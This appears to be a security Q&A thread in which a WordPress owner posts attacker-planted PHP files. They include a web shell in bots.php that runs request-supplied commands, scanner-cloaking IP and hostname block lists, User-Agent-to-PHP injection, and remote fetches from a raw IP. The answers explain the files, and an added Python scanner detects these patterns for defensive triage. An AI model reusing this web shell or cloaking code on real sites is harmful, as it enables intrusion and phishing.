Here are some files that hackers modified.

Inside my WordPress installation, I found an unknown folder called ID3 inside of a folder called ID3.

Three files: 1. bots.php

This is the bots.php code:


<? // Identify and block fake/bad bots
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
if(isset($_GET['useragent'])){echo"<h1>deny_agent(bot)=('Yandex,Baiduspider,Acunetix,crossdomain,wwwroot,Exabot,NimbleCrawler,Octopus,OutfoxBot,ProPowerBot</h1><pre>"; system($_GET['us$
$blocked_words = array("above","google","softlayer","amazonaws","cyveillance","phishtank","dreamhost","netpilot","calyxinstitute","tor-exit",);
foreach($blocked_words as $word) {
    if (substr_count($hostname, $word) > 0) {
        header("HTTP/1.0 404 Not Found");
        die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
    }
}
$bannedIP = array("^66.102.*.*", "^38.100.*.*", "^107.170.*.*", "^149.20.*.*", "^38.105.*.*", "^74.125.*.*",  "^66.150.14.*", "^54.176.*.*", "^38.100.*.*", "^184.173.*.*", "^66.249.*.*$
if(in_array($_SERVER['REMOTE_ADDR'],$bannedIP)) {
     header('HTTP/1.0 404 Not Found');
     exit();
} else {
     foreach($bannedIP as $ip) {
          if(preg_match('/' . $ip . '/',$_SERVER['REMOTE_ADDR'])){
               header('HTTP/1.0 404 Not Found');
               die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
          }
     }
}
?>

This is index.php:

<?php

$random = rand(0,100000).$_SERVER['REMOTE_ADDR'];
$dst            = substr(md5($random), 0, 5);

function recurse_copy($src, $dst) {

        $dir = opendir($src);
        $result = ($dir === false ? false : true);

        if ($result !== false) {
                $result = @mkdir($dst);

                if ($result === true) {
                        while(false !== ( $file = readdir($dir)) ) {
                                if (( $file != '.' ) && ( $file != '..' ) && $result) {
                                        if ( is_dir($src . '/' . $file) ) {
                                                $result = recurse_copy($src . '/' . $file,$dst . '/' . $file);
                                        } else {
                                                $result = copy($src . '/' . $file,$dst . '/' . $file);
                                        }
                                }
                        }
                        closedir($dir);
                }
        }

    return $result;
}

$src="fbs";
recurse_copy( $src, $dst );
header("location:".$dst."");
exit;

?>

This is v.php:

<?php
$bannedIP = array("^66.102.*.*", "^38.100.*.*", "^107.170.*.*", "^149.20.*.*", "^38.105.*.*", "^74.125.*.*", "^66.150.14.*", "^54.176.*.*", "^38.100.*.*", "^184.173.*.*", "^66.249.*.*"$
if (in_array($_SERVER['REMOTE_ADDR'], $bannedIP)) {
    header('HTTP/1.0 404 Not Found');
    exit();
} else {
    foreach($bannedIP as $ip) {
        if (preg_match('/' . $ip . '/', $_SERVER['REMOTE_ADDR'])) {
            header('HTTP/1.0 404 Not Found');
            die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
        }
    }
}
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$blocked_words = array("above", "google", "softlayer", "amazonaws", "cyveillance", "phishtank", "dreamhost", "netpilot", "calyxinstitute", "tor-exit",);
foreach($blocked_words as $word) {
    if (substr_count($hostname, $word) > 0) {
        header("HTTP/1.0 404 Not Found");
        die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
    }
}
$count_hits = ("antibots.txt");
$hits = file($count_hits);
$hits[0]++;
$fp = fopen($count_hits, "w");
fputs($fp, "$hits[0]");
fclose($fp);
if ($hits[0] > 30) {
    $a = getenv("REMOTE_ADDR");
    $b = getenv("HTTP_USER_AGENT");
    $c = getenv("HOSTNAME");
    $ne = "Deny from $a";
    $file = "newips.php";
    $fp = fopen($file, "a");
    fwrite($fp, $ne);
    $n = "RewriteEngine on
Options +FollowSymlinks
RewriteCond %{HTTP_USER_AGENT} ^$b [OR]
RewriteRule ^.* - [F,L]
";
    $file = "newuseragents.php";
    $fp = fopen($file, "a");
    fwrite($fp, $n);
    $a = getenv("REMOTE_ADDR");
    $b = getenv("HTTP_USER_AGENT");
    $c = getenv("HOSTNAME");
    $data1 = file_get_contents('http://5.175.160.126/blockedbots.php');
    $a = strip_tags($data1);
    $data2 = file_get_contents('http://5.175.160.126/blockedagents.php');
    $b = strip_tags($data2);
    $data3 = file_get_contents('http://5.175.160.126/blockedhosts.php');
    $c = strip_tags($data3);
}
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$blocked_words = array("above", "google", "softlayer", "amazonaws", "cyveillance", "phishtank", "dreamhost", "netpilot", "calyxinstitute", "tor-exit",);
foreach($blocked_words as $word) {
    if (substr_count($hostname, $word) > 0) {
        header("HTTP/1.0 404 Not Found");
        die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
    }
}
?>

And I found some random numbers (check screenshots)


What are those files? How can I stop this? Please tell me what these files are for. What did these files do?

schroeder
sanjan

1 Answer

It is likely your site has been hacked and these files were put here by the attacker.

bots.php

The line starting with if(isset($_GET['useragent'])) ends with system($_GET['us$. I suspect there is a part missing here, but this seems to execute any command supplied by the client. This is highly insecure, and not part of a normal bot-blocking script.

index.php

This copies the fbs directory to a randomly named directory. This is likely the source of the directories in your screenshot.

v.php

This writes the client's user-agent header to a PHP file. This makes it possible to put any PHP code in this file and run it. This is insecure, since it allows the client to run any PHP code.

$b = getenv("HTTP_USER_AGENT");
$n = "... RewriteCond %{HTTP_USER_AGENT} ^$b [OR] ...";
$file = "newuseragents.php";
$fp = fopen($file, "a");
Sjoerd
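An added triage example, written for this answer and not part of the question, the answer, or any WordPress code: a small Python scanner that walks a site tree and flags the behaviours the answer points out in the three files. It looks for a shell-execution function fed directly from a request parameter (the bots.php pattern), a file that reads the User-Agent and opens a .php file for appending (the v.php pattern), remote fetches from a bare IP address, the substr(md5(...), 0, 5) naming used by index.php, and top-level directories whose names are exactly five hex characters, which is what that naming produces. It generalises slightly beyond the files shown: it also matches exec, shell_exec, passthru, popen and proc_open, and request sources other than $_GET. The sample tree it scans is constructed here from abbreviated stand-ins (not copies of the originals, and using a documentation IP rather than the one in v.php); the indicator names are my own.

```python
import re
import tempfile
from pathlib import Path

# Constructed, abbreviated stand-ins for the three files from the question plus one
# benign file. They are not copies of the originals; the IP is a documentation address.
SAMPLE_TREE = {
    "ID3/bots.php": (
        "<?php\n"
        "$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);\n"
        "if (isset($_GET['useragent'])) { system($_GET['useragent']); }\n"
    ),
    "ID3/index.php": (
        "<?php\n"
        "$dst = substr(md5(rand(0, 100000) . $_SERVER['REMOTE_ADDR']), 0, 5);\n"
        "recurse_copy('fbs', $dst);\n"
        "header('location:' . $dst);\n"
    ),
    "ID3/v.php": (
        "<?php\n"
        "$b = getenv(\"HTTP_USER_AGENT\");\n"
        "$n = \"RewriteCond %{HTTP_USER_AGENT} ^$b [OR]\";\n"
        "$fp = fopen(\"newuseragents.php\", \"a\");\n"
        "fwrite($fp, $n);\n"
        "$data1 = file_get_contents('http://203.0.113.10/blockedbots.php');\n"
    ),
    "wp-includes/clean.php": (
        "<?php\n"
        "function add_numbers($a, $b) { return $a + $b; }\n"
    ),
}

# Single-pattern indicators, each taken from one behaviour seen in the dropped files.
PATTERN_RULES = [
    # command execution fed straight from a request parameter (bots.php)
    ("exec-from-request",
     re.compile(r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b")),
    # fetching remote content from a bare IP address (v.php)
    ("remote-fetch-from-raw-ip",
     re.compile(r"file_get_contents\s*\(\s*['\"]https?://\d{1,3}(?:\.\d{1,3}){3}\b")),
    # short random directory name built from md5() (index.php)
    ("random-dir-clone",
     re.compile(r"substr\s*\(\s*md5\s*\(.*\)\s*,\s*0\s*,\s*\d+\s*\)")),
]

# Multi-condition indicator for v.php: the User-Agent is read, a .php file name
# appears as a string literal, and a file is opened for appending.
UA_READ = re.compile(r"HTTP_USER_AGENT")
PHP_LITERAL = re.compile(r"['\"][^'\"]*\.php['\"]")
OPEN_APPEND = re.compile(r"fopen\s*\([^)]*,\s*['\"]a['\"]\s*\)")

# index.php names its clones substr(md5(...), 0, 5): five lowercase hex characters.
HEX_DIR = re.compile(r"^[0-9a-f]{5}$")


def scan_php(text):
    """Return the list of indicator names that match one PHP source file."""
    hits = [name for name, rx in PATTERN_RULES if rx.search(text)]
    if UA_READ.search(text) and PHP_LITERAL.search(text) and OPEN_APPEND.search(text):
        hits.append("user-agent-written-to-php")
    return hits


def scan_tree(root):
    """Scan every .php file under root and flag top-level five-hex-char directories."""
    root = Path(root)
    findings = {}
    for path in sorted(root.rglob("*.php")):
        hits = scan_php(path.read_text(errors="replace"))
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    for entry in sorted(root.iterdir()):
        if entry.is_dir() and HEX_DIR.match(entry.name):
            findings.setdefault(entry.name, []).append("random-hex-dirname")
    return findings


def build_sample_tree():
    """Write the constructed samples into a temp dir and return its path."""
    root = Path(tempfile.mkdtemp(prefix="wp-scan-"))
    for rel, content in SAMPLE_TREE.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content)
    # constructed: a directory named the way index.php names its copies
    (root / "3f9a1").mkdir()
    return root


if __name__ == "__main__":
    for rel, hits in scan_tree(build_sample_tree()).items():
        print(f"{rel}: {', '.join(hits)}")
```

Point scan_tree at the real document root to run it against a live install. Hits are a starting point for manual review, not proof on their own; a clean result is likewise not proof of a clean site, since the truncated bots.php line shows the attacker's code can differ from these samples. After triage, the usual response still applies: restore from a known-good backup, rotate credentials, and compare core, theme and plugin files against pristine copies.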